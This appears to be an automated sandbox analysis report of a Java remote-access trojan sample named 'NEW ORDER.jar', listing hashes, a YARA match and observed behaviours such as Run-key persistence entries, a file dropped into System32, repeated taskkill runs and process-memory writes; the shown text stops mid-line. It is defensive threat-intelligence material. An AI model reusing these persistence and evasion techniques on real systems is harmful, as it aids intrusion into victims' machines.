Analysis
-
max time kernel
149s -
max time network
154s -
platform
windows10_x64 -
resource
win10 -
submitted
19-08-2020 14:10
Static task
static1
Behavioral task
behavioral1
Sample
NEW ORDER.jar
Resource
win7
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
NEW ORDER.jar
Resource
win10
0 signatures
0 seconds
General
-
Target
NEW ORDER.jar
-
Size
399KB
-
MD5
742703cc1772f82cd50660194d7c47a9
-
SHA1
6d1ec923aaa205a97cf5c0975b9a7d87a0fade9d
-
SHA256
ac718fd470592d7ee950f0f6c53d0e170fa70a229ef9694c8863f9c1b52ebda4
-
SHA512
c41908b802924f678c3ae31691e679d664deb9fd9074f5a9b8b6c296d085d1c3fb1b2bd0b83cf797af1e5e267d9bec33aff474a78ab5419d969062962a4e3e33
Score
10/10
Malware Config
Signatures
-
Qarallax RAT support DLL 1 IoCs
resource yara_rule behavioral2/files/0x000100000001ae50-52.dat qarallax_dll -
Sets file execution options in registry 2 TTPs
-
Loads dropped DLL 1 IoCs
pid Process 3060 java.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce java.exe Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\DsGIILk = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\FVKwo\\WbZqr.class\"" java.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run java.exe Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run\DsGIILk = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\FVKwo\\WbZqr.class\"" java.exe -
Drops desktop.ini file(s) 4 IoCs
description ioc Process File opened for modification C:\Users\Admin\FVKwo\Desktop.ini java.exe File created C:\Users\Admin\FVKwo\Desktop.ini java.exe File opened for modification C:\Users\Admin\FVKwo\Desktop.ini attrib.exe File opened for modification C:\Users\Admin\FVKwo\Desktop.ini attrib.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\System32\gWunt java.exe File opened for modification C:\Windows\System32\gWunt java.exe -
Kills process with taskkill 16 IoCs
pid Process 896 taskkill.exe 4172 taskkill.exe 4120 taskkill.exe 4232 taskkill.exe 4400 taskkill.exe 1428 taskkill.exe 2088 taskkill.exe 1896 taskkill.exe 5008 taskkill.exe 5076 taskkill.exe 4600 taskkill.exe 68 taskkill.exe 3056 taskkill.exe 2824 taskkill.exe 4204 taskkill.exe 4460 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2916 powershell.exe 2916 powershell.exe 2916 powershell.exe 2916 powershell.exe -
Suspicious use of AdjustPrivilegeToken 122 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 3756 WMIC.exe Token: SeSecurityPrivilege 3756 WMIC.exe Token: SeTakeOwnershipPrivilege 3756 WMIC.exe Token: SeLoadDriverPrivilege 3756 WMIC.exe Token: SeSystemProfilePrivilege 3756 WMIC.exe Token: SeSystemtimePrivilege 3756 WMIC.exe Token: SeProfSingleProcessPrivilege 3756 WMIC.exe Token: SeIncBasePriorityPrivilege 3756 WMIC.exe Token: SeCreatePagefilePrivilege 3756 WMIC.exe Token: SeBackupPrivilege 3756 WMIC.exe Token: SeRestorePrivilege 3756 WMIC.exe Token: SeShutdownPrivilege 3756 WMIC.exe Token: SeDebugPrivilege 3756 WMIC.exe Token: SeSystemEnvironmentPrivilege 3756 WMIC.exe Token: SeRemoteShutdownPrivilege 3756 WMIC.exe Token: SeUndockPrivilege 3756 WMIC.exe Token: SeManageVolumePrivilege 3756 WMIC.exe Token: 33 3756 WMIC.exe Token: 34 3756 WMIC.exe Token: 35 3756 WMIC.exe Token: 36 3756 WMIC.exe Token: SeIncreaseQuotaPrivilege 3756 WMIC.exe Token: SeSecurityPrivilege 3756 WMIC.exe Token: SeTakeOwnershipPrivilege 3756 WMIC.exe Token: SeLoadDriverPrivilege 3756 WMIC.exe Token: SeSystemProfilePrivilege 3756 WMIC.exe Token: SeSystemtimePrivilege 3756 WMIC.exe Token: SeProfSingleProcessPrivilege 3756 WMIC.exe Token: SeIncBasePriorityPrivilege 3756 WMIC.exe Token: SeCreatePagefilePrivilege 3756 WMIC.exe Token: SeBackupPrivilege 3756 WMIC.exe Token: SeRestorePrivilege 3756 WMIC.exe Token: SeShutdownPrivilege 3756 WMIC.exe Token: SeDebugPrivilege 3756 WMIC.exe Token: SeSystemEnvironmentPrivilege 3756 WMIC.exe Token: SeRemoteShutdownPrivilege 3756 WMIC.exe Token: SeUndockPrivilege 3756 WMIC.exe Token: SeManageVolumePrivilege 3756 WMIC.exe Token: 33 3756 WMIC.exe Token: 34 3756 WMIC.exe Token: 35 3756 WMIC.exe Token: 36 3756 WMIC.exe Token: SeIncreaseQuotaPrivilege 1008 WMIC.exe Token: SeSecurityPrivilege 1008 WMIC.exe Token: SeTakeOwnershipPrivilege 1008 WMIC.exe Token: SeLoadDriverPrivilege 1008 WMIC.exe Token: SeSystemProfilePrivilege 1008 WMIC.exe Token: SeSystemtimePrivilege 1008 WMIC.exe Token: SeProfSingleProcessPrivilege 1008 WMIC.exe Token: SeIncBasePriorityPrivilege 1008 WMIC.exe Token: SeCreatePagefilePrivilege 1008 WMIC.exe Token: SeBackupPrivilege 1008 WMIC.exe Token: SeRestorePrivilege 1008 WMIC.exe Token: SeShutdownPrivilege 1008 WMIC.exe Token: SeDebugPrivilege 1008 WMIC.exe Token: SeSystemEnvironmentPrivilege 1008 WMIC.exe Token: SeRemoteShutdownPrivilege 1008 WMIC.exe Token: SeUndockPrivilege 1008 WMIC.exe Token: SeManageVolumePrivilege 1008 WMIC.exe Token: 33 1008 WMIC.exe Token: 34 1008 WMIC.exe Token: 35 1008 WMIC.exe Token: 36 1008 WMIC.exe Token: SeIncreaseQuotaPrivilege 1008 WMIC.exe Token: SeSecurityPrivilege 1008 WMIC.exe Token: SeTakeOwnershipPrivilege 1008 WMIC.exe Token: SeLoadDriverPrivilege 1008 WMIC.exe Token: SeSystemProfilePrivilege 1008 WMIC.exe Token: SeSystemtimePrivilege 1008 WMIC.exe Token: SeProfSingleProcessPrivilege 1008 WMIC.exe Token: SeIncBasePriorityPrivilege 1008 WMIC.exe Token: SeCreatePagefilePrivilege 1008 WMIC.exe Token: SeBackupPrivilege 1008 WMIC.exe Token: SeRestorePrivilege 1008 WMIC.exe Token: SeShutdownPrivilege 1008 WMIC.exe Token: SeDebugPrivilege 1008 WMIC.exe Token: SeSystemEnvironmentPrivilege 1008 WMIC.exe Token: SeRemoteShutdownPrivilege 1008 WMIC.exe Token: SeUndockPrivilege 1008 WMIC.exe Token: SeManageVolumePrivilege 1008 WMIC.exe Token: 33 1008 WMIC.exe Token: 34 1008 WMIC.exe Token: 35 1008 WMIC.exe Token: 36 1008 WMIC.exe Token: SeDebugPrivilege 68 taskkill.exe Token: SeDebugPrivilege 2916 powershell.exe Token: SeDebugPrivilege 3056 taskkill.exe Token: SeDebugPrivilege 1428 taskkill.exe Token: SeIncreaseQuotaPrivilege 2916 powershell.exe Token: SeSecurityPrivilege 2916 powershell.exe Token: SeTakeOwnershipPrivilege 2916 powershell.exe Token: SeLoadDriverPrivilege 2916 powershell.exe Token: SeSystemProfilePrivilege 2916 powershell.exe Token: SeSystemtimePrivilege 2916 powershell.exe Token: SeProfSingleProcessPrivilege 2916 powershell.exe Token: SeIncBasePriorityPrivilege 2916 powershell.exe Token: SeCreatePagefilePrivilege 2916 powershell.exe Token: SeBackupPrivilege 2916 powershell.exe Token: SeRestorePrivilege 2916 powershell.exe Token: SeShutdownPrivilege 2916 powershell.exe Token: SeDebugPrivilege 2916 powershell.exe Token: SeSystemEnvironmentPrivilege 2916 powershell.exe Token: SeRemoteShutdownPrivilege 2916 powershell.exe Token: SeUndockPrivilege 2916 powershell.exe Token: SeManageVolumePrivilege 2916 powershell.exe Token: 33 2916 powershell.exe Token: 34 2916 powershell.exe Token: 35 2916 powershell.exe Token: 36 2916 powershell.exe Token: SeDebugPrivilege 2088 taskkill.exe Token: SeDebugPrivilege 1896 taskkill.exe Token: SeDebugPrivilege 896 taskkill.exe Token: SeDebugPrivilege 2824 taskkill.exe Token: SeDebugPrivilege 4172 taskkill.exe Token: SeDebugPrivilege 5008 taskkill.exe Token: SeDebugPrivilege 5076 taskkill.exe Token: SeDebugPrivilege 4120 taskkill.exe Token: SeDebugPrivilege 4232 taskkill.exe Token: SeDebugPrivilege 4204 taskkill.exe Token: SeDebugPrivilege 4400 taskkill.exe Token: SeDebugPrivilege 4460 taskkill.exe Token: SeDebugPrivilege 4600 taskkill.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3060 java.exe -
Suspicious use of WriteProcessMemory 382 IoCs
description pid Process procid_target PID 3060 wrote to memory of 2064 3060 java.exe 68 PID 3060 wrote to memory of 2064 3060 java.exe 68 PID 3060 wrote to memory of 3144 3060 java.exe 70 PID 3060 wrote to memory of 3144 3060 java.exe 70 PID 3144 wrote to memory of 3756 3144 cmd.exe 72 PID 3144 wrote to memory of 3756 3144 cmd.exe 72 PID 3060 wrote to memory of 640 3060 java.exe 73 PID 3060 wrote to memory of 640 3060 java.exe 73 PID 640 wrote to memory of 1008 640 cmd.exe 75 PID 640 wrote to memory of 1008 640 cmd.exe 75 PID 3060 wrote to memory of 1104 3060 java.exe 76 PID 3060 wrote to memory of 1104 3060 java.exe 76 PID 3060 wrote to memory of 1332 3060 java.exe 78 PID 3060 wrote to memory of 1332 3060 java.exe 78 PID 3060 wrote to memory of 1644 3060 java.exe 80 PID 3060 wrote to memory of 1644 3060 java.exe 80 PID 3060 wrote to memory of 1788 3060 java.exe 81 PID 3060 wrote to memory of 1788 3060 java.exe 81 PID 3060 wrote to memory of 1804 3060 java.exe 83 PID 3060 wrote to memory of 1804 3060 java.exe 83 PID 3060 wrote to memory of 2076 3060 java.exe 85 PID 3060 wrote to memory of 2076 3060 java.exe 85 PID 3060 wrote to memory of 2152 3060 java.exe 87 PID 3060 wrote to memory of 2152 3060 java.exe 87 PID 3060 wrote to memory of 2192 3060 java.exe 89 PID 3060 wrote to memory of 2192 3060 java.exe 89 PID 3060 wrote to memory of 752 3060 java.exe 92 PID 3060 wrote to memory of 752 3060 java.exe 92 PID 3060 wrote to memory of 2916 3060 java.exe 94 PID 3060 wrote to memory of 2916 3060 java.exe 94 PID 3060 wrote to memory of 2340 3060 java.exe 95 PID 3060 wrote to memory of 2340 3060 java.exe 95 PID 3060 wrote to memory of 68 3060 java.exe 96 PID 3060 wrote to memory of 68 3060 java.exe 96 PID 3060 wrote to memory of 3284 3060 java.exe 97 PID 3060 wrote to memory of 3284 3060 java.exe 97 PID 3060 wrote to memory of 3752 3060 java.exe 102 PID 3060 wrote to memory of 3752 3060 java.exe 102 PID 3060 wrote to memory of 3764 3060 java.exe 103 PID 3060 wrote to memory of 3764 3060 java.exe 103 PID 3060 wrote to memory of 1156 3060 java.exe 106 PID 3060 wrote to memory of 1156 3060 java.exe 106 PID 3060 wrote to memory of 1108 3060 java.exe 107 PID 3060 wrote to memory of 1108 3060 java.exe 107 PID 3060 wrote to memory of 1908 3060 java.exe 110 PID 3060 wrote to memory of 1908 3060 java.exe 110 PID 3060 wrote to memory of 2156 3060 java.exe 111 PID 3060 wrote to memory of 2156 3060 java.exe 111 PID 3060 wrote to memory of 1980 3060 java.exe 114 PID 3060 wrote to memory of 1980 3060 java.exe 114 PID 3060 wrote to memory of 2324 3060 java.exe 116 PID 3060 wrote to memory of 2324 3060 java.exe 116 PID 3060 wrote to memory of 3056 3060 java.exe 118 PID 3060 wrote to memory of 3056 3060 java.exe 118 PID 3060 wrote to memory of 1304 3060 java.exe 119 PID 3060 wrote to memory of 1304 3060 java.exe 119 PID 3060 wrote to memory of 2684 3060 java.exe 122 PID 3060 wrote to memory of 2684 3060 java.exe 122 PID 752 wrote to memory of 3832 752 cmd.exe 125 PID 752 wrote to memory of 3832 752 cmd.exe 125 PID 3060 wrote to memory of 2540 3060 java.exe 126 PID 3060 wrote to memory of 2540 3060 java.exe 126 PID 3060 wrote to memory of 1224 3060 java.exe 128 PID 3060 wrote to memory of 1224 3060 java.exe 128 PID 3060 wrote to memory of 3928 3060 java.exe 130 PID 3060 wrote to memory of 3928 3060 java.exe 130 PID 3060 wrote to memory of 2548 3060 java.exe 132 PID 3060 wrote to memory of 2548 3060 java.exe 132 PID 3060 wrote to memory of 3812 3060 java.exe 134 PID 3060 wrote to memory of 3812 3060 java.exe 134 PID 752 wrote to memory of 2688 752 cmd.exe 135 PID 752 wrote to memory of 2688 752 cmd.exe 135 PID 3060 wrote to memory of 1652 3060 java.exe 137 PID 3060 wrote to memory of 1652 3060 java.exe 137 PID 3060 wrote to memory of 3904 3060 java.exe 139 PID 3060 wrote to memory of 3904 3060 java.exe 139 PID 3060 wrote to memory of 3780 3060 java.exe 141 PID 3060 wrote to memory of 3780 3060 java.exe 141 PID 3060 wrote to memory of 2820 3060 java.exe 143 PID 3060 wrote to memory of 2820 3060 java.exe 143 PID 3060 wrote to memory of 1428 3060 java.exe 145 PID 3060 wrote to memory of 1428 3060 java.exe 145 PID 2820 wrote to memory of 3808 2820 cmd.exe 147 PID 2820 wrote to memory of 3808 2820 cmd.exe 147 PID 2820 wrote to memory of 1060 2820 cmd.exe 148 PID 2820 wrote to memory of 1060 2820 cmd.exe 148 PID 3060 wrote to memory of 3024 3060 java.exe 149 PID 3060 wrote to memory of 3024 3060 java.exe 149 PID 3024 wrote to memory of 2788 3024 cmd.exe 151 PID 3024 wrote to memory of 2788 3024 cmd.exe 151 PID 3024 wrote to memory of 3852 3024 cmd.exe 152 PID 3024 wrote to memory of 3852 3024 cmd.exe 152 PID 3060 wrote to memory of 1812 3060 java.exe 153 PID 3060 wrote to memory of 1812 3060 java.exe 153 PID 1812 wrote to memory of 2192 1812 cmd.exe 155 PID 1812 wrote to memory of 2192 1812 cmd.exe 155 PID 1812 wrote to memory of 732 1812 cmd.exe 156 PID 1812 wrote to memory of 732 1812 cmd.exe 156 PID 3060 wrote to memory of 1104 3060 java.exe 157 PID 3060 wrote to memory of 1104 3060 java.exe 157 PID 1104 wrote to memory of 1780 1104 cmd.exe 159 PID 1104 wrote to memory of 1780 1104 cmd.exe 159 PID 1104 wrote to memory of 416 1104 cmd.exe 160 PID 1104 wrote to memory of 416 1104 cmd.exe 160 PID 3060 wrote to memory of 836 3060 java.exe 161 PID 3060 wrote to memory of 836 3060 java.exe 161 PID 836 wrote to memory of 564 836 cmd.exe 163 PID 836 wrote to memory of 564 836 cmd.exe 163 PID 836 wrote to memory of 2608 836 cmd.exe 165 PID 836 wrote to memory of 2608 836 cmd.exe 165 PID 3060 wrote to memory of 1992 3060 java.exe 166 PID 3060 wrote to memory of 1992 3060 java.exe 166 PID 1992 wrote to memory of 2180 1992 cmd.exe 168 PID 1992 wrote to memory of 2180 1992 cmd.exe 168 PID 1992 wrote to memory of 3808 1992 cmd.exe 169 PID 1992 wrote to memory of 3808 1992 cmd.exe 169 PID 3060 wrote to memory of 1908 3060 java.exe 170 PID 3060 wrote to memory of 1908 3060 java.exe 170 PID 1908 wrote to memory of 1496 1908 cmd.exe 172 PID 1908 wrote to memory of 1496 1908 cmd.exe 172 PID 3060 wrote to memory of 2088 3060 java.exe 173 PID 3060 wrote to memory of 2088 3060 java.exe 173 PID 1908 wrote to memory of 2548 1908 cmd.exe 174 PID 1908 wrote to memory of 2548 1908 cmd.exe 174 PID 3060 wrote to memory of 1604 3060 java.exe 176 PID 3060 wrote to memory of 1604 3060 java.exe 176 PID 1604 wrote to memory of 2076 1604 cmd.exe 178 PID 1604 wrote to memory of 2076 1604 cmd.exe 178 PID 1604 wrote to memory of 2604 1604 cmd.exe 179 PID 1604 wrote to memory of 2604 1604 cmd.exe 179 PID 3060 wrote to memory of 2092 3060 java.exe 180 PID 3060 wrote to memory of 2092 3060 java.exe 180 PID 2092 wrote to memory of 3928 2092 cmd.exe 182 PID 2092 wrote to memory of 3928 2092 cmd.exe 182 PID 2092 wrote to memory of 2072 2092 cmd.exe 183 PID 2092 wrote to memory of 2072 2092 cmd.exe 183 PID 3060 wrote to memory of 1292 3060 java.exe 184 PID 3060 wrote to memory of 1292 3060 java.exe 184 PID 1292 wrote to memory of 732 1292 cmd.exe 186 PID 1292 wrote to memory of 732 1292 cmd.exe 186 PID 1292 wrote to memory of 2172 1292 cmd.exe 187 PID 1292 wrote to memory of 2172 1292 cmd.exe 187 PID 3060 wrote to memory of 3028 3060 java.exe 188 PID 3060 wrote to memory of 3028 3060 java.exe 188 PID 3028 wrote to memory of 692 3028 cmd.exe 190 PID 3028 wrote to memory of 692 3028 cmd.exe 190 PID 3028 wrote to memory of 2824 3028 cmd.exe 191 PID 3028 wrote to memory of 2824 3028 cmd.exe 191 PID 3060 wrote to memory of 3668 3060 java.exe 192 PID 3060 wrote to memory of 3668 3060 java.exe 192 PID 3060 wrote to memory of 1896 3060 java.exe 194 PID 3060 wrote to memory of 1896 3060 java.exe 194 PID 3668 wrote to memory of 1780 3668 cmd.exe 196 PID 3668 wrote to memory of 1780 3668 cmd.exe 196 PID 3668 wrote to memory of 2608 3668 cmd.exe 197 PID 3668 wrote to memory of 2608 3668 cmd.exe 197 PID 3060 wrote to memory of 2652 3060 java.exe 198 PID 3060 wrote to memory of 2652 3060 java.exe 198 PID 2652 wrote to memory of 632 2652 cmd.exe 200 PID 2652 wrote to memory of 632 2652 cmd.exe 200 PID 2652 wrote to memory of 2172 2652 cmd.exe 201 PID 2652 wrote to memory of 2172 2652 cmd.exe 201 PID 3060 wrote to memory of 2640 3060 java.exe 202 PID 3060 wrote to memory of 2640 3060 java.exe 202 PID 2640 wrote to memory of 3640 2640 cmd.exe 204 PID 2640 wrote to memory of 3640 2640 cmd.exe 204 PID 2640 wrote to memory of 3732 2640 cmd.exe 205 PID 2640 wrote to memory of 3732 2640 cmd.exe 205 PID 3060 wrote to memory of 2160 3060 java.exe 206 PID 3060 wrote to memory of 2160 3060 java.exe 206 PID 2160 wrote to memory of 3756 2160 cmd.exe 208 PID 2160 wrote to memory of 3756 2160 cmd.exe 208 PID 2160 wrote to memory of 632 2160 cmd.exe 209 PID 2160 wrote to memory of 632 2160 cmd.exe 209 PID 3060 wrote to memory of 500 3060 java.exe 210 PID 3060 wrote to memory of 500 3060 java.exe 210 PID 500 wrote to memory of 424 500 cmd.exe 212 PID 500 wrote to memory of 424 500 cmd.exe 212 PID 500 wrote to memory of 3852 500 cmd.exe 213 PID 500 wrote to memory of 3852 500 cmd.exe 213 PID 3060 wrote to memory of 2240 3060 java.exe 214 PID 3060 wrote to memory of 2240 3060 java.exe 214 PID 2240 wrote to memory of 3272 2240 cmd.exe 216 PID 2240 wrote to memory of 3272 2240 cmd.exe 216 PID 2240 wrote to memory of 3808 2240 cmd.exe 217 PID 2240 wrote to memory of 3808 2240 cmd.exe 217 PID 3060 wrote to memory of 2548 3060 java.exe 218 PID 3060 wrote to memory of 2548 3060 java.exe 218 PID 3060 wrote to memory of 896 3060 java.exe 220 PID 3060 wrote to memory of 896 3060 java.exe 220 PID 2548 wrote to memory of 3904 2548 cmd.exe 221 PID 2548 wrote to memory of 3904 2548 cmd.exe 221 PID 2548 wrote to memory of 2184 2548 cmd.exe 223 PID 2548 wrote to memory of 2184 2548 cmd.exe 223 PID 3060 wrote to memory of 3692 3060 java.exe 224 PID 3060 wrote to memory of 3692 3060 java.exe 224 PID 3692 wrote to memory of 2092 3692 cmd.exe 226 PID 3692 wrote to memory of 2092 3692 cmd.exe 226 PID 3692 wrote to memory of 3668 3692 cmd.exe 227 PID 3692 wrote to memory of 3668 3692 cmd.exe 227 PID 3060 wrote to memory of 3748 3060 java.exe 228 PID 3060 wrote to memory of 3748 3060 java.exe 228 PID 3748 wrote to memory of 1104 3748 cmd.exe 230 PID 3748 wrote to memory of 1104 3748 cmd.exe 230 PID 3748 wrote to memory of 3004 3748 cmd.exe 231 PID 3748 wrote to memory of 3004 3748 cmd.exe 231 PID 3060 wrote to memory of 2652 3060 java.exe 232 PID 3060 wrote to memory of 2652 3060 java.exe 232 PID 2652 wrote to memory of 2824 2652 cmd.exe 234 PID 2652 wrote to memory of 2824 2652 cmd.exe 234 PID 2652 wrote to memory of 3024 2652 cmd.exe 235 PID 2652 wrote to memory of 3024 2652 cmd.exe 235 PID 3060 wrote to memory of 1304 3060 java.exe 236 PID 3060 wrote to memory of 1304 3060 java.exe 236 PID 1304 wrote to memory of 2148 1304 cmd.exe 238 PID 1304 wrote to memory of 2148 1304 cmd.exe 238 PID 1304 wrote to memory of 3976 1304 cmd.exe 239 PID 1304 wrote to memory of 3976 1304 cmd.exe 239 PID 3060 wrote to memory of 3640 3060 java.exe 240 PID 3060 wrote to memory of 3640 3060 java.exe 240 PID 3640 wrote to memory of 2164 3640 cmd.exe 242 PID 3640 wrote to memory of 2164 3640 cmd.exe 242 PID 3640 wrote to memory of 1424 3640 cmd.exe 243 PID 3640 wrote to memory of 1424 3640 cmd.exe 243 PID 3060 wrote to memory of 3808 3060 java.exe 244 PID 3060 wrote to memory of 3808 3060 java.exe 244 PID 3808 wrote to memory of 3812 3808 cmd.exe 246 PID 3808 wrote to memory of 3812 3808 cmd.exe 246 PID 3808 wrote to memory of 3768 3808 cmd.exe 247 PID 3808 wrote to memory of 3768 3808 cmd.exe 247 PID 3060 wrote to memory of 1160 3060 java.exe 248 PID 3060 wrote to memory of 1160 3060 java.exe 248 PID 1160 wrote to memory of 504 1160 cmd.exe 250 PID 1160 wrote to memory of 504 1160 cmd.exe 250 PID 1160 wrote to memory of 408 1160 cmd.exe 251 PID 1160 wrote to memory of 408 1160 cmd.exe 251 PID 3060 wrote to memory of 3668 3060 java.exe 252 PID 3060 wrote to memory of 3668 3060 java.exe 252 PID 3668 wrote to memory of 3100 3668 cmd.exe 254 PID 3668 wrote to memory of 3100 3668 cmd.exe 254 PID 3668 wrote to memory of 1104 3668 cmd.exe 255 PID 3668 wrote to memory of 1104 3668 cmd.exe 255 PID 3060 wrote to memory of 692 3060 java.exe 256 PID 3060 wrote to memory of 692 3060 java.exe 256 PID 3060 wrote to memory of 2824 3060 java.exe 257 PID 3060 wrote to memory of 2824 3060 java.exe 257 PID 692 wrote to memory of 2180 692 cmd.exe 260 PID 692 wrote to memory of 2180 692 cmd.exe 260 PID 692 wrote to memory of 2164 692 cmd.exe 261 PID 692 wrote to memory of 2164 692 cmd.exe 261 PID 3060 wrote to memory of 488 3060 java.exe 262 PID 3060 wrote to memory of 488 3060 java.exe 262 PID 488 wrote to memory of 1880 488 cmd.exe 264 PID 488 wrote to memory of 1880 488 cmd.exe 264 PID 488 wrote to memory of 1292 488 cmd.exe 265 PID 488 wrote to memory of 1292 488 cmd.exe 265 PID 3060 wrote to memory of 2076 3060 java.exe 266 PID 3060 wrote to memory of 2076 3060 java.exe 266 PID 2076 wrote to memory of 2672 2076 cmd.exe 268 PID 2076 wrote to memory of 2672 2076 cmd.exe 268 PID 2076 wrote to memory of 1512 2076 cmd.exe 269 PID 2076 wrote to memory of 1512 2076 cmd.exe 269 PID 3060 wrote to memory of 632 3060 java.exe 270 PID 3060 wrote to memory of 632 3060 java.exe 270 PID 632 wrote to memory of 1000 632 cmd.exe 272 PID 632 wrote to memory of 1000 632 cmd.exe 272 PID 632 wrote to memory of 1660 632 cmd.exe 273 PID 632 wrote to memory of 1660 632 cmd.exe 273 PID 3060 wrote to memory of 2824 3060 java.exe 274 PID 3060 wrote to memory of 2824 3060 java.exe 274 PID 2824 wrote to memory of 1880 2824 cmd.exe 276 PID 2824 wrote to memory of 1880 2824 cmd.exe 276 PID 2824 wrote to memory of 1292 2824 cmd.exe 277 PID 2824 wrote to memory of 1292 2824 cmd.exe 277 PID 3060 wrote to memory of 1104 3060 java.exe 278 PID 3060 wrote to memory of 1104 3060 java.exe 278 PID 1104 wrote to memory of 564 1104 cmd.exe 280 PID 1104 wrote to memory of 564 1104 cmd.exe 280 PID 1104 wrote to memory of 1564 1104 cmd.exe 281 PID 1104 wrote to memory of 1564 1104 cmd.exe 281 PID 3060 wrote to memory of 3976 3060 java.exe 282 PID 3060 wrote to memory of 3976 3060 java.exe 282 PID 3976 wrote to memory of 572 3976 cmd.exe 284 PID 3976 wrote to memory of 572 3976 cmd.exe 284 PID 3976 wrote to memory of 2888 3976 cmd.exe 285 PID 3976 wrote to memory of 2888 3976 cmd.exe 285 PID 3060 wrote to memory of 904 3060 java.exe 286 PID 3060 wrote to memory of 904 3060 java.exe 286 PID 904 wrote to memory of 1292 904 cmd.exe 288 PID 904 wrote to memory of 1292 904 cmd.exe 288 PID 904 wrote to memory of 3812 904 cmd.exe 289 PID 904 wrote to memory of 3812 904 cmd.exe 289 PID 3060 wrote to memory of 1424 3060 java.exe 290 PID 3060 wrote to memory of 1424 3060 java.exe 290 PID 1424 wrote to memory of 3812 1424 cmd.exe 292 PID 1424 wrote to memory of 3812 1424 cmd.exe 292 PID 1424 wrote to memory of 4104 1424 cmd.exe 293 PID 1424 wrote to memory of 4104 1424 cmd.exe 293 PID 3060 wrote to memory of 4124 3060 java.exe 294 PID 3060 wrote to memory of 4124 3060 java.exe 294 PID 4124 wrote to memory of 4160 4124 cmd.exe 296 PID 4124 wrote to memory of 4160 4124 cmd.exe 296 PID 3060 wrote to memory of 4172 3060 java.exe 297 PID 3060 wrote to memory of 4172 3060 java.exe 297 PID 4124 wrote to memory of 4220 4124 cmd.exe 299 PID 4124 wrote to memory of 4220 4124 cmd.exe 299 PID 3060 wrote to memory of 4236 3060 java.exe 300 PID 3060 wrote to memory of 4236 3060 java.exe 300 PID 4236 wrote to memory of 4292 4236 cmd.exe 302 PID 4236 wrote to memory of 4292 4236 cmd.exe 302 PID 4236 wrote to memory of 4308 4236 cmd.exe 303 PID 4236 wrote to memory of 4308 4236 cmd.exe 303 PID 3060 wrote to memory of 4328 3060 java.exe 304 PID 3060 wrote to memory of 4328 3060 java.exe 304 PID 4328 wrote to memory of 4364 4328 cmd.exe 306 PID 4328 wrote to memory of 4364 4328 cmd.exe 306 PID 4328 wrote to memory of 4384 4328 cmd.exe 307 PID 4328 wrote to memory of 4384 4328 cmd.exe 307 PID 3060 wrote to memory of 4404 3060 java.exe 308 PID 3060 wrote to memory of 4404 3060 java.exe 308 PID 4404 wrote to memory of 4440 4404 cmd.exe 310 PID 4404 wrote to memory of 4440 4404 cmd.exe 310 PID 4404 wrote to memory of 4460 4404 cmd.exe 311 PID 4404 wrote to memory of 4460 4404 cmd.exe 311 PID 3060 wrote to memory of 4480 3060 java.exe 312 PID 3060 wrote to memory of 4480 3060 java.exe 312 PID 4480 wrote to memory of 4516 4480 cmd.exe 314 PID 4480 wrote to memory of 4516 4480 cmd.exe 314 PID 4480 wrote to memory of 4536 4480 cmd.exe 315 PID 4480 wrote to memory of 4536 4480 cmd.exe 315 PID 3060 wrote to memory of 4556 3060 java.exe 316 PID 3060 wrote to memory of 4556 3060 java.exe 316 PID 4556 wrote to memory of 4592 4556 cmd.exe 318 PID 4556 wrote to memory of 4592 4556 cmd.exe 318 PID 4556 wrote to memory of 4612 4556 cmd.exe 319 PID 4556 wrote to memory of 4612 4556 cmd.exe 319 PID 3060 wrote to memory of 4632 3060 java.exe 320 PID 3060 wrote to memory of 4632 3060 java.exe 320 PID 4632 wrote to memory of 4668 4632 cmd.exe 322 PID 4632 wrote to memory of 4668 4632 cmd.exe 322 PID 4632 wrote to memory of 4688 4632 cmd.exe 323 PID 4632 wrote to memory of 4688 4632 cmd.exe 323 PID 3060 wrote to memory of 4708 3060 java.exe 324 PID 3060 wrote to memory of 4708 3060 java.exe 324 PID 4708 wrote to memory of 4744 4708 cmd.exe 326 PID 4708 wrote to memory of 4744 4708 cmd.exe 326 PID 4708 wrote to memory of 4764 4708 cmd.exe 327 PID 4708 wrote to memory of 4764 4708 cmd.exe 327 PID 3060 wrote to memory of 4784 3060 java.exe 328 PID 3060 wrote to memory of 4784 3060 java.exe 328 PID 4784 wrote to memory of 4820 4784 cmd.exe 330 PID 4784 wrote to memory of 4820 4784 cmd.exe 330 PID 4784 wrote to memory of 4840 4784 cmd.exe 331 PID 4784 wrote to memory of 4840 4784 cmd.exe 331 PID 3060 wrote to memory of 4860 3060 java.exe 332 PID 3060 wrote to memory of 4860 3060 java.exe 332 PID 4860 wrote to memory of 4896 4860 cmd.exe 334 PID 4860 wrote to memory of 4896 4860 cmd.exe 334 PID 4860 wrote to memory of 4912 4860 cmd.exe 335 PID 4860 wrote to memory of 4912 4860 cmd.exe 335 PID 3060 wrote to memory of 4932 3060 java.exe 336 PID 3060 wrote to memory of 4932 3060 java.exe 336 PID 4932 wrote to memory of 4968 4932 cmd.exe 338 PID 4932 wrote to memory of 4968 4932 cmd.exe 338 PID 4932 wrote to memory of 4988 4932 cmd.exe 339 PID 4932 wrote to memory of 4988 4932 cmd.exe 339 PID 3060 wrote to memory of 5008 3060 java.exe 340 PID 3060 wrote to memory of 5008 3060 java.exe 340 PID 3060 wrote to memory of 5076 3060 java.exe 342 PID 3060 wrote to memory of 5076 3060 java.exe 342 PID 3060 wrote to memory of 4120 3060 java.exe 344 PID 3060 wrote to memory of 4120 3060 java.exe 344 PID 3060 wrote to memory of 4232 3060 java.exe 346 PID 3060 wrote to memory of 4232 3060 java.exe 346 PID 3060 wrote to memory of 4204 3060 java.exe 348 PID 3060 wrote to memory 